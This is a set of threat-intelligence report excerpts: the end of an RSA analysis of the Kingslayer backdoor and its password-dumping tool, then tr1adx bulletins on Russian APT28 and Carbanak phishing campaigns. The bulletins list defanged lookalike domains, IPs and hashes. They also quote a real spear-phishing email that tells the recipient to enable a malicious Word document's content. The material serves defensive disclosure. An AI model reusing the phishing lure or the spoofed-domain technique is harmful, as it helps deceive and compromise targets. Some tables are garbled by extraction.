executable and runs it, then writes the status to the console (Figure 17). Because this software is running as a service, it is running in Windows Session 0;
therefore the console is hidden from the user.
Figure 17 Additional payload execution
There exists an alternate path and URL to this DLL loading functionality. In
[Redacted]Service.AnalyzeLogs.Execute() email sending functionality there is
an unencrypted URL and password (Figure 18).
Figure 18 Alternate URL in Kingslayer backdoor
The registration date of the domain (Table 4) contained in this URL coincides
with the timeframe of the known compromise of Alpha
s source code and websites in late March, 2015.
Table 4 2015 timekard.com registration details
Beaconing to this domain has not been observed and RSA Research believes
this code will only execute if the application is configured to send email reports
on logs. In mid-2016 the domain registration for timekard[.]com expired and
was registered by a legitimate entity having nothing to do with the malicious
activity described in this investigation.
APPENDIX B: SELECT FORENSIC FINDINGS FROM
AN ENTERPRISE ADMIN
S MACHINE INFECTED WITH
KINGSLAYER AND THE K2 SECONDARY MALWARE
The machine investigated was used by Iota
s principal Windows system administrator, and had the backdoored event log analysis service installed on 22 April
2015 at 19:07:18 UTC (Table 5), which was in the known subversion window of
Alpha
s websites.
Table 5 Event log analysis application service installation
The SYSTEM hive contains the Application Compatibility Cache entries. These
entries track executable files for compatibility purposes between Windows
upgrades. Several suspicious entries (Table 6) were discovered during the host
triage. It is important to note that the timestamps on these entries are the $SI
MTIME of the file and are not reliable indicators.
Table 6 Suspicious ShimCache entries
ANALYSIS OF BP.EXE
In this same directory an executable was discovered that will find, decrypt and
display passwords saved in Chrome and Firefox (Table 7). This file had an $FN
CTIME of 17 August 2015 12:26:20.292 and did not appear to be executed as it
was not in the shimcache. The file was owned by the Windows security identifier (SID) S-1-5-32-544, the SYSTEM account. This matches with the owner of
the running backdoored event log analysis service, which also runs as SYSTEM.
Table 7 Password dumper
The password dumper starts by gathering system information about the current logged-on user in order to discover the individual user paths such as C:\
Users\Usera\AppData. It then begins reading the SQLlite database files and
decrypting saved passwords.
Figure 19 SQLite database file path
The sample has the SQLite libraries statically linked at compile time, which accounts for the large size. It then leverages these functions to query the SQLite
database to retrieve the encrypted stored passwords.
Figure 20 Selecting encrypted passwords
Sub_401BA9 leads to a series of calls to get the logged on user, impersonate
that user in order to open the Windows key store to retrieve the encryption
keys and, finally, decrypts the user
s stored passwords.
Figure 21 Stored password decryption
If the sample was successful, it will print the decrypted URL, Username and
Password to the terminal.
Figure 22 Terminal output of password dumper
After the sample has finished with Chrome passwords it moves on in a similar
fashion to stored Firefox passwords and prints them to the terminal.
Figure 23 Firefox output
[tr1adx]: Intel
tr1adx.net/intel/TIB-00003.html
tr1adx Intelligence Bulletin (TIB) 00003: Bear Spotting Vol. 1: Russian Nation State Targeting of Government and Military Interests
[Published: January 9, 2017] [Last Updated: January 15, 2017]
Summary
The tr1adx team performs on-going research into Threat Actors, irrespective of their motivation, provenance, or targets.
tr1adx Intelligence Bulletin #00003 shares intel on Russian Nation State Cyber Activity targeting Government and Military
interests around the world. Please note this is an active bulletin, meaning we will occassionally add intel and information to
this bulletin as we uncover new campaigns, targets or actors which meet the criteria.
tr1adx's research was able to identify targets in various countries and/or regions, including:
Turkey
Japan
Denmark
United States
Venezuela
India
NATO Affiliated Targets
United Nations
Analysis
TTP's associated with Russian Nation State Threat Actors (Civil and Military Intelligence/GRU/APT28/APT29) allow us to
track these Threat Actors' activities with a high/moderate degree of confidence, and follow their trail of breadcrumbs through
past, present, and future campaigns. While, for operational security reasons, we cannot go into detail on our techniques,
practices, and sources for intelligence collection and analysis, we can say that the majority of the information published in
this bulletin is based on in-depth research leveraging available Open Source Intelligence (OSINT) sources. In a few cases,
intel data has been enriched by, derived from, and collected through other non-OSINT means.
Indicators of Compromise
Added on 2017-01-15:
Domain
Creation
Date
Campaign
Status
Targeted Org
Targeted
Country
Targeted
Domain
Analyst Notes (and
other fun anecdotes)
dpko[.]info
201610-29
Unknown
United
Nations (UN)
Department of
Peacekeeping
Operations
(DPKO)
United
States
un.org
UN DPKO website
unausanyc[.]com
201512-02
Unknown
United
Nations
Association of
New York
United
States
unanyc.org
Identified phishing
originating from this
domain targeting the
Venezuelan
government
(minpal.gob.ve)
ausa[.]info
2015-
Inactive
Association of
United
ausa.org
ESET identified
ausa[.]info
201507-19
Inactive
Association of
the United
States Army
(AUSA)
United
States
ausa.org
ESET identified
similar indicator
(ausameetings[.]com)
in their APT28/Sednit
report.
mea-gov[.]in
201502-20
Inactive
Ministry of
External
Affairs (MEA)
India
mea.gov.in
mfa-news[.]com
201504-30
Inactive
Ministry of
Foreign Affairs
(MFA) Fake
news site
defenceinform[.]com
201505-05
Inactive
MDefense
Related Fake
news site
middleeastreview[.]com
201504-15
Inactive
Middle East
Review of
International
Affairs
(MERIA)
United
States
rubincenter.org
middleeasterview[.]com
201504-15
Inactive
Middle East
Review of
International
Affairs
(MERIA)
United
States
rubincenter.org
foreign-review[.]com
201504-14
Inactive
Foreign Affairs
Fake news
site
Added on 2017-01-09:
Domain
Creation
Date
Campaign
Status
Targeted Org
Targeted
Country
Targeted
Domain
Analyst Notes (and other
fun anecdotes)
afceaint[.]org
201611-02
Inactive
Armed Forces
Communications
and Electronics
Association
(AFCEA)
United
States
afcea.org
Identified 2 related
indicators, one of which
ties in to another
campaign:
ns1[.]afceaint[.]org
(216.155.143.28)
ns2[.]afceaint[.]org
(216.155.143.27)
af-army[.]us
201610-17
Active
Army / Air Force
United
States
army.mil /
af.mil
The af-army[.]us domain
was seen resolving to
167.114.35.70, which is
listed as one of the IP
listed as one of the IP
addresses in the
GRIZZLY STEPPE report.
webmailmil[.]dk (*)
201503-25
Inactive
Defence
Command
Denmark
webmail.mil.dk
Domain was hosted on
216.155.143.27, also
seen in AFCEA campaign.
Seriously? We know it's
been 2 years and the
Denmark Defense
campaign may not have
been publicized but come
on guys... #BadOpsec!
natonevvs[.]org
201610-05
Unknown
North Atlantic
Treaty
Organization
(NATO) Affiliates
jimin-jp[.]biz
201612-27
Active
Liberal
Democratic
Party of Japan
Japan
jimin.jp
Per our Japanese Gov't
sources, domain has
been observed in targeted
malware.
jica-gojp[.]biz
201612-27
Active
Japan
International
Cooperation
Agency
Japan
jica.go.jp
Per our Japanese Gov't
sources, domain has
been observed in targeted
malware.
mofa-gojp[.]com
201612-27
Active
Ministry of
Foreign Affairs
Japan
mofa.go.jp
Per our Japanese Gov't
sources, domain has
been observed in targeted
malware.
turkeymia[.]com
201612-20
Active
Ministry of
Interior Ankara
(MIA)
Turkey
mia.gov.tr
Spoofed domain points to
legitimate MIA domain:
icisleri.gov.tr
turkeyicisleri[.]com
201612-20
Active
Ministry of
Interior Ankara
(MIA)
Turkey
icisleri.gov.tr
Spoofed domain points to
legitimate MIA domain:
icisleri.gov.tr
(*) Legitimate organization appears to have claimed control over the spoofed/mimicked domain.
Indicators of Compromise (IOCs) [Downloadable Files]:
TIB-00003 Domain IOCs [TXT]
If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber
investigative processes immediately and engage Law Enforcement where appropriate.
[tr1adx]: Intel
tr1adx.net/intel/TIB-00002.html
tr1adx Intelligence Bulletin (TIB) 00002: The "Digital Plagiarist" Campaign: TelePorting the Carbanak Crew to a New Dimension
[January 1, 2017]
Summary
Over the past few months, the tr1adx team has been tracking a Threat Actor which we codenamed "TelePort Crew".
We believe the "TelePort Crew" Threat Actor is operating out of Russia or Eastern Europe with the group's major motivations appearing to be financial in
nature through cybercrime and/or corporate espionage.
We have dubbed the group's latest campaign "Digital Plagiarist" for its signature practice of mirroring legitimate sites (using Tenmax's TelePort Pro and
TelePort Ultra site mirroring software) onto similarly named domains, on which the TelePort Crew would host and serve up malware laden Office
documents.
The Threat Actor would then craft specific spear phishing emails to direct their targets to visit the malicious web sites and open the malware laden
documents.
Corerrelation of the TelePort Crew's TTPs and infrastructure leads us to believe the group is closely affiliated with, and may in fact be, the Carbanak
Threat Actor.
At this time, we are able to disclose that we have seen activity associated with the "Digital Plagiarist" campaign in the following countries:
Australia
United Kingdom
United States
Ireland
Switzerland
Bahamas
Focused Industries for the "Digital Plagiarist" campaign include:
Hospitality
Restaurant Chains
Food Production
Nutritional Supplements
Agriculture / BioTechnology
Marketing / Public Relations
Manufacturing
Logistics
Software Development (including Point-of-Sale solutions)
Utilities & Electric
Government
Analysis
Activity attributed to the "Digital Plagiarist" campaign first came on tr1adx's radar in the fall of 2016, when the TelePort Crew threat actor was seen registering a
number of domain names which raised flags due to the suspicious nature of the domain names, attributes associated with the domain registration, and content
served on these domains. Further research indicates that the "Digital Plagiarist" campaign has been active since at least July 2016, and possibly earlier, with
very rapid turn around times between the provisioning of attack/C2 infrastructure and execution of the actual attacks.
Based on our observations, we believe the TelePort Crew threat actor has performed considerable research on their targets, including mapping out
business/customer relationships between the targets as well as understanding other geographic and target "trust" specific attributes often seen in cases of
watering hole attacks.
Overview of Attack Methodology and TTP's
Domain Registration
The TelePort Crew would start off by registering domain names, which closely resemble those of legitimate web sites. These web sites would be designed to
either mimic the group's intended target, or a third party trusted by the intended target. The majority of these domain registrations appear to use a single
registrar, "PDR Ltd. d/b/a PublicDomainRegistry.com", and in some cases the Threat Actor would recycle the same Registrant Information. We also noted a
number of specific differentiators when it comes to comparing the Registrant Information and the types of malicious websites that were used.
The following table summarizes some of the more interesting domains we have seen the TelePort Crew threat actor register as part of the "Digital Plagiarist"
campaign. While some of these domains are used for malware delivery, others are used for email domain spoofing, and C2 communications. A full list of
(disclosable) domains suspected to be associated with the TelePort Crew's "Digital Plagiarist" campaign is provided in the Indicators of Compromise section:
Domain
Creation
Date
Registrant
Registrar
Org Mimicked
Country
Domain Mimicked
Industry
microfocus-official[.]com
201610-28
Andrey
Arseniev
PDR Ltd.
d/b/a
Micro Focus
International
United
Kingdom
microfocus.com
Software
Development
perrigointernational[.]com
2016-
Andrey
PDR Ltd.
Perrigo
United
perrigo.com
Healthcare
perrigointernational[.]com
201610-28
Andrey
Arseniev
PDR Ltd.
d/b/a
Perrigo
Company plc
United
States
perrigo.com
Healthcare
ornuafood[.]com
201610-28
Andrey
Arseniev
PDR Ltd.
d/b/a
Ornua Food
Ireland
ornua.com
Food Production
esb-energy-int[.]com
201610-27
Dresde
Nore
PDR Ltd.
d/b/a
Electricity
Supply Board
Ireland
esb.ie
Utilities & Electric
fda-gov[.]com
201612-09
Smolin
Sergei
PDR Ltd.
d/b/a
US Food and
Drug
Administration
(FDA)
United
States
fda.gov
Government
treasurygovernment[.]com
201612-09
Smolin
Sergei
PDR Ltd.
d/b/a
Department of
the Treasury
United
States
treasury.gov
Government
bentley-systems-ltd[.]com
201610-27
Dresde
Nore
PDR Ltd.
d/b/a
Bentley
Systems
United
States
bentley.com
Software
Development
zynga-ltd[.]com
201610-27
Dresde
Nore
PDR Ltd.
d/b/a
Zynga
United
States
zynga.com
Software
Development
syngenta-usa[.]com (*)
201610-27
Dresde
Nore
PDR Ltd.
d/b/a
Syngenta
Switzerland
syngenta-us.com
Agriculture/BioTech
ai0ha[.]com
201611-29
Garry
Torp
PDR Ltd.
d/b/a
Aloha, Inc.
United
States
aloha.com
Nutritional
Supplements
iris-woridwide[.]com
201611-29
Garry
Torp
PDR Ltd.
d/b/a
iris Worldwide
United
Kingdom
iris-worldwide.com
Marketing/Public
Relations
strideindustrialusa[.]com
201512-21
Andrew
Zavok
PDR Ltd.
d/b/a
Stride
Industrial
Group Ltd
United
Kingdom
strideindustrialgroup.com
Manufacturing
waldorfs-astoria[.]com
201612-11
Fred Hesl
PDR Ltd.
d/b/a
WaldorfAstoria
United
States
waldorf-astoria.com
Hospitality
atlantis-bahamas[.]com
201612-11
Fred Hesl
PDR Ltd.
d/b/a
Atlantis
Bahamas
Bahamas
atlantisbahamas.com
Hospitality
sizzier[.]com
201612-01
Egor
Danilkin
PDR Ltd.
d/b/a
Sizzler Family
Restaurants
United
States
sizzler.com
Restaurant Chain
taskretaiitechnology[.]com
201612-01
Egor
Danilkin
PDR Ltd.
d/b/a
Task Retail
Technology
Australia
taskretailtechnology.com
Software
Development
dhl-service-au[.]com
201609-27
Remin
Vladmiri
PDR Ltd.
d/b/a
DHL Australia
Australia
dhl.com.au
Logistics
prsnewwire[.]com
201608-30
Remin
Vladmiri
PDR Ltd.
d/b/a
PR Newswire
United
States
prnewswire.com
Marketing/Public
Relations
(*) Legitimate organization reclaimed the mimicked/spoofed domain.
Once the malicious domain had been registered, the group would point it to one of the following IP addresses:
Domain Mirroring
The Threat Actor would then use the TelePort Pro or TelePort Ultra software to mirror the content of the legitimate organization's web site to the newly registered
domain. While in the majority of cases the TelePort Pro software would "flawlessly" mirror the web sites, if the web page contains links to external pages which
are outside the scope of the TelePort site mirroring configuration, the software will rewrite some of the links in the mirrored HTML files as follows:
Traces of TelePort Ultra seen on irisworidwide[.]com domain:
Traces of TelePort Pro seen on prsnewwire[.]com domain:
Malware Delivery
Malware Delivery
We were able to identify and confirm at least two separate instances where above domains were used to serve up malicious Office documents:
The malware document "order.docx" is a stage 1 binary which, when opened by the end user, will download a stage 2 binary through the embedded macros in
the malicious Office document. TrustWave recently did a great write up entitled "New Carbanak / Anunak Attack Methodology ", which provides additional details
regarding the malware used in that campaign, as well as an overview of C2 communications and actor TTPs. Based on correlation of TTP's and infrastructure,
we are fairly confident that the TelePort Crew is closely affiliated with, or is in fact the Carbanak Threat Actor. We also believe the "Digital Plagiarist" campaign is
associated with, or an evolution of, the campaign described in the recent TrustWave report.
Once the domains were properly mirrored and outfitted with malware, the TelePort Crew would craft spearphishing emails to their targets in order to lure them to
download and open malicious Office documents hosted on one of the above domains. We have been able to observe at least one reported instance of such a
spearphishing email related to the "Digital Plagiarist" campaign.
barry_frith@shoneys.com -> "mailto:sizzier_company@yahoo.com"
From: barry_frith@shoneys.com
Sent: Wednesday, December 14, 2016 10:33 AM
To: R_bgt, Briargate 0186
Subject: catering
Hello,
My name is George Thon and I'm an Project Manager with Sizzier Ltd.
We have composed a list of services we require and interested in.
Enclosed link contains all catering informatiom - http://www.sizzier.com/docs/order.docx
Click on edit anyway at the top of the page and than double click to unlock content
Sincerely,
George Thon
Sizzier Ltd.
Campaign and Infrastructure Clean Up
At the time of this writing, at least one of the malicious documents is still being served on one of the above listed domains. While all of the above listed domains
are still active, only a few are still serving up mirrored content. When we started investigating this threat actor a few months ago, we were able to observe that
almost all of the above listed domains were, at one time, serving up mirrored page content.
Based on all elements of our research, we believe the TelePort Crew threat actor will remove malicious and non-malicious content once successful execution of
the malware on the target has been achieved. At the same time, our analysis leads us to suggest that the TelePort Crew may also delete or rename malicious
content when the Threat Actor believes their operation has been compromised.
Targeted Industry / Organizations Interrelations
As we started investigating the Teleport Crew threat actor and the "Digital Plagiarist" campaign, it became apparent fairly quickly that the group has spent a
considerable effort in understanding and mapping out affinities and business/customer relationships between their targets and the domains they would register.
A good example of that is the relationship between Sizzler Family Restaurants (TelePort Crew registered "sizzier[.]com") and Task Retail Technology
(TelePort Crew registered "taskretaiitechnology[.]com"):
Sizzler Family Restaurants is a restaurant chain operating in the United States and abroad (including Australia).
Task Retail Technology is a software development company based in Australia, who develop the xchangexec Enterprise Point-of-Sale (POS)
software.
The Task Retail Technology web site lists Sizzler as one of their customers.
Another, yet less obvious example, is that of the "relationship" between Perrigo (TelePort Crew registered "perrigointernational[.]com") and Syngenta
(TelePort Crew registered "syngenta-usa[.]com"):
Perrigo is a US based Pharmaceutical Company.
Syngenta is a Swiss Agribusiness/BioTech firm, with offices in the United States.
Based on multiple news reports [1] [2] [3] [4], both firms have seen similar investor profiles and were also both linked to Merger & Acquisition
activity over the past year.
In a potentially more sinister, and entirely speculative twist, there may be a relationship between TrustWave and iris Worldwide Marketing (TelePort Crew
registered "iris-woridwide[.]com"):
iris Worldwide is marketing company responsible for marketing of some of the world's biggest brands.
TrustWave is a security company who recently published an article regarding the Carbanak / Anunak Threat Actor and their new Attack
Methodology.
Apparently, iris Worlwide was responsible for a marketing campaign around TrustWave's Global Security Report.
Attribution
The tr1adx team initially started tracking this Threat Actor under the codename "TelePort Crew" as a result of some of their TTP's. As we were delving deeper
into the group's activities, we were seeing increasing overlap with TTP's and infrastructure associated with the Carbanak / Anunak threat actor, which was
confirmed as we compared notes with the information in the TrustWave article, entitled "New Carbanak / Anunak Attack Methodology ", published in November
2016.
Several elements strongly suggest TelePort Crew and Carbanak/Anunak may be one and the same threat actor:
tr1adx's investigation, as well as the TrustWave investigation, point to a single IP address where the registered domains were hosted (192.99.14.211)
tr1adx's investigation revealed that two domains we had been tracking (dhl-service-au[.]com and prsnewwire[.]com) were registered by a Registrant
Name purporting to be "Remin Vladmiri". The same individual also registered "park-travels[.]com", which has been associated with the Carbanak/Anunak
threat actor.
The malware used in the "Digital Plagiarist" campaign appears to closely resemble that attributed to the Carbanak/Anunak threat actor, in terms of
malware delivery, malware URL path, and behavior.
Disclaimer
The tr1adx team believes it is important to note that while we have seen this threat actor register domains similar in nature to domains belonging to legitimate
organizations, we are in no way suggesting that these legitimate organizations or its customers were a direct target for the TelePort Crew threat actor. We do
believe the group has leveraged the reputation and legitimacy of these organizations to give more credit to the "Digital Plagiarist" campaign, in turn potentially
yielding a higher rate of success for compromising the group's victims.
Indicators of Compromise
Indicators of Compromise (IOCs): Domains (25+) - Summary Table
microfocus-official[.]com
iris-woridwide[.]com
google3-ssl[.]com
perrigointernational[.]com
strideindustrialusa[.]com
google4-ssl[.]com
ornuafood[.]com
waldorfs-astoria[.]com
ssl-googles4[.]com
esb-energy-int[.]com
atlantis-bahamas[.]com
google2-ssl[.]com
fda-gov[.]com
sizzier[.]com
google5-ssl[.]com
treasury-government[.]com
taskretaiitechnology[.]com
ssl-googlesr5[.]com
bentley-systems-ltd[.]com
dhl-service-au[.]com
bols-googls[.]com
zynga-ltd[.]com
prsnewwire[.]com
syngenta-usa[.]com
google-ssls[.]com
ai0ha[.]com
google-stel[.]com
Indicators of Compromise (IOCs): IP Addresses - Summary Table
192.99.14.211
31.41.41.41
144.76.61.231
Indicators of Compromise (IOCs): File Hashes - Summary Table
order.docx
MD5: 950afc52444e3b23a4923ab07c1e7d87
SHA1: 1827a7daa98c127af11318eebe23ec367f9146c9
order.docx
MD5: ae8404ad422e92b1be7561c418c35fb7
SHA1: 400f02249ba29a19ad261373e6ff3488646e95fb
Indicators of Compromise (IOCs) [Downloadable Files]:
If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber investigative processes
immediately and engage Law Enforcement where appropriate.
[tr1adx]: Intel
tr1adx.net/intel/TIB-00004.html
tr1adx Intelligence Bulletin (TIB) 00004: A Pretty Dope Story About Bears: Early Indicators of Continued World Anti-Doping Agency (WADA)
Targeting
[Published: January 14, 2017]
Summary
The tr1adx team identified what we believe to be a new campaign, which we assess to be attributed to the Russian Nation State
Threat Actor APT28 (a.k.a. Fancy Bear), yet again targeting the World Anti-Doping Agency (WADA) . In September 2016, WADA
confirmed they were the victim of a successful breach, which occurred over the summer of 2016, and purportedly attributed to APT28,
as was reported in WADA's press release on the attack. For those interested, ThreatConnect published an informative write up on
this breach, entitled "Russian Cyber Operations On Steroids", detailing the APT28 campaign targeting WADA.
Analysis
On January 14, 2017, the tr1adx team observed what we believe to be early stages of a new campaign targeting the World AntiDoping Agency (WADA) or affiliates. A Threat Actor, following similar TTP's to those we have seen Russian Nation State Threat Actor
APT28 use, has registered two domains which we assess may be used in further cyber attacks against the WADA or its affiliates.
Additionally, in a move similar to TTP's described in ThreatConnect's "Russian Cyber Operations On Steroids" report, we believe the
Threat Actor may be preparing to launch, or has already launched a phishing campaign against their targets.
Indicators of Compromise
Added on 2017-01-14:
Domain
Creation
Date
Campaign
Status
Targeted
Targeted
Country
Targeted
Domain
Analyst Notes (and other fun
anecdotes)
worlddopingagency[.]com
201701-14
Active
World
AntiDoping
Agency
(WADA)
Canada
wadaama.org
Identified 1 related indicator:
201701-14
Active
World
AntiDoping
Agency
(WADA)
Canada
wadaama.org
Identified 1 related indicator:
dopingagency[.]com
mail[.]worlddopingagency[.]com
(40.112.145.124)
mail[.]dopingagency[.]com
(40.112.145.124)
Indicators of Compromise (IOCs) [Downloadable Files]:
TIB-00004 Domain IOCs [TXT]
If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber
investigative processes immediately and engage Law Enforcement where appropriate.
Recommendations
Evidence suggests this campaign may be in the early execution phase. As such, a number of preventative and detective controls can
be instrumented to deter this Threat Actor from achieiving their mission:
Block traffic to and from any of the above listed domains and IP addresses on proxies and firewalls.
Block emails originating from or going to aforementioned domains (worlddopingagency[.]com and dopingagency[.]com).
Search through SIEM/Log Analysis tools for traces of connections to and from these domains or IP addresses, as well as
proactively create alerting rules in SIEM or IDS/IPS.
Recommendation for WADA: Get these domains taken down ASAP.